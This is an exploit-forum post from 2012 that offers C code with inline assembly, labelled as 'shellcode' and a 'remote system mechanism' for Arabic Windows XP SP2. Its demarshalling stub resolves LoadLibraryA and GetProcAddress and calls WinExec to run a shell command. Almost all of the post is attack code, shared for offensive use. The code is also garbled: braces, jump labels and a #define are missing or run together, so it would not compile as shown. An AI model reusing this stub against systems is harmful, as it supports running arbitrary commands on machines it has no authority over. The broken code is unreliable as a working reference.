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windows xp sp2 [ arabic] mechanism shellcode 128 bytes+proxy=500bytes
来源:www.facebook.com/fysl.fyslm 作者:TrOoN 发布时间:2012-02-03  
# Title :windows xp sp2 [ arabic]  mechanism  shellcode 128 bytes+proxy=500bytes

# Author :TrOoN

# E-mail : SOUrRce-x@live.fr  |   www.facebook.com/fysl.fyslm

# Home : city 617 logts  : Draria . algeria

# Web Site : www.1337day.com       | 1337Day is ThE best pentes Security

# platform :  WinDows XP sp 2     AraBic    |

# platform i used in this shellcode : Back track 5  | windows xp arabIc sp2

# Type : local exploit /SHELL CODE  /ETc...

#Download link :http://www.microsoft.com

# 1337day sys : mechanism   is  remote system  [shellcode]


//  if you add proxy ; shellcode 128bytes +  proxy = 500bytes :p
// windows xp sp2 [ arabic]  remote system  mechanism
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int Marshall( unsigned char flags, unsigned size, unsigned char *data,
unsigned char *out, unsigned out_len )
out[0] = flags;
*((unsigned *)(&(out[1]))) = size;
memcpy( &(out[5]), data, size );
return size + 5;
//////1337 Day shellcode///////////////
// Parameter       //////////////////
// this thing is a pointer to a thing, rather than the thing itself
#define IS_PTR 0x01
// everything is either in, out or in | out
#define IS_IN 0x02
#define IS_OUT 0x04
// null terminated data
#define IS_SZ 0x08
// null short terminated data (e.g. unicode string)define IS_SZZ 0x10
// Function       //////////
// function is __cdecl (default is __stdcall)
#define FN_CDECL 0x01
int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void
*getproc )
// params:
// ebp: dllname
// +4 : fnname
// +8 : num_params
// +12 : out_param_size
// +16 : function_flags
// +20 : params_so_far
// +24 : loadlibrary
// +28 : getprocaddress
// +32 : address of out data buffer
// set up params - this is a little complicated
// due to the fact we’re calling a function with inline asm
push ebp
sub esp, 0x100
mov ebp, esp
mov ebx, dword ptr[ebp+0x158]; // buff
mov dword ptr [ebp + 12], 0;
mov eax, dword ptr [ebp+0x15c];//loadlib
mov dword ptr[ebp + 24], eax;
mov eax, dword ptr [ebp+0x160];//getproc
mov dword ptr[ebp + 28], eax;
mov dword ptr [ebp], ebx; // ebx = dllname
sub esp, 0x800; // give ourselves some data space
mov dword ptr[ebp + 32], esp;
jmp start;
// increment ebx until it points to a ‘0’ byte
mov al, byte ptr [ebx];
cmp al, 0;
jz done_string;
inc ebx;
jmp skip_string;
inc ebx;
// so skip the dll name
call skip_string;
// store function name
mov dword ptr[ ebp + 4 ], ebx
// skip the function name
call skip_string;
// store parameter count
mov ecx, dword ptr [ebx]
mov edx, ecx
mov dword ptr[ ebp + 8 ], ecx
// store out param size
add ebx,4
mov ecx, dword ptr [ebx]
mov dword ptr[ ebp + 12 ], ecx
// store function flags
add ebx,4
mov ecx, dword ptr [ebx]
mov dword ptr[ ebp + 16 ], ecx
add ebx,4
// in this loop, edx holds the num parameters we have left to do.
cmp edx, 0
je call_proc
mov cl, byte ptr[ ebx ]; // cl = flags
inc ebx;
mov eax, dword ptr[ ebx ]; // eax = size
add ebx, 4;
mov ch,cl;
and cl, 1; // is it a pointer?
jz not_ptr;
mov cl,ch;
// is it an ‘in’ or ‘inout’ pointer?
and cl, 2;
jnz is_in;
// so it’s an ‘out’
// get current data pointer
mov ecx, dword ptr [ ebp + 32 ]
push ecx
// set our data pointer to end of data buffer
add dword ptr [ ebp + 32 ], eax
add ebx, eax
dec edx
jmp next_param
push ebx
// arg is ‘in’ or ‘inout’
// this implies that the data is contained in the received packet
add ebx, eax
dec edx
jmp next_param
mov eax, dword ptr[ ebx ];
push eax;
add ebx, 4
dec edx
jmp next_param;

// args are now set up. let’s call...
mov eax, dword ptr[ ebp ];
push eax;
mov eax, dword ptr[ ebp + 24 ];
call eax;
mov ebx, eax;
mov eax, dword ptr[ ebp + 4 ];
push eax;
push ebx;
mov eax, dword ptr[ ebp + 28 ];
call eax; // this is getprocaddress
call eax; // this is our function call
// now we tidy up
add esp, 0x800;
add esp, 0x100;
pop ebp
return 1;
int main( int argc, char *argv[] )
unsigned char buff[ 256 ];
unsigned char *psz;
DWORD freq = 1234;
DWORD dur = 1234;
DWORD show = 0;
HANDLE hk32;
void *loadlib, *getproc;
char *cmd = “cmd /c dir > c:\\1337day.txt”;
psz = buff;
strcpy( psz, “kernel32.dll” );
psz += strlen( psz ) + 1;
strcpy( psz, “WinExec” );
psz += strlen( psz ) + 1;
*((unsigned *)(psz)) = 2; // parameter count
psz += 4;
*((unsigned *)(psz)) = strlen( cmd ) + 1; // parameter size
psz += 4;

// set fn_flags
*((unsigned *)(psz)) = 0;
psz += 4;
psz += Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show,
psz, sizeof( buff ) );
psz += Marshall( IS_PTR | IS_IN, strlen( cmd ) + 1, (unsigned char
*)cmd, psz, sizeof( buff ) );
hk32 = LoadLibrary( “kernel32.dll” );
loadlib = GetProcAddress( hk32, “LoadLibraryA” );
getproc = GetProcAddress( hk32, “GetProcAddress” );
AsmDemarshallAndCall( buff, loadlib, getproc );
return 0;

 ########################################### 1337day all  |  ######################################### 

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